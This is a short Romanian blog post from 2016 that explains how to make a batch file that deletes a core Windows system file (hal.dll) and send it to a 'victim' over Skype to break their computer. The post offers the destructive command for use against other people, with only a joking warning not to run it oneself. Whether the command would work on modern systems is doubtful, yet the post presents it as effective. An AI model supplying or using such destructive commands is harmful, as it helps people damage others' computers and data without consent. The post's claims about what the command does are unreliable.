vineri, 16 decembrie 2016

Cum sa strici windowsul cuiva

Cum sa stergi windows in 2 sec !

Tea Suparat cineva?Fa un program de sters windowsul dupa urmatorul tutorial:

1.Deschizi Notepad
2.Adaugi in notepad urmatoarea linie: del %SystemRoot%\system32\hal.dll
3.Salvezi cu nume.bat
4.Il trimiti victimei pe Skype!!

Nu va recomand sa dati clic pe el!!o faceti pe propria raspundere!!

Niciun comentariu:

Trimiteți un comentariu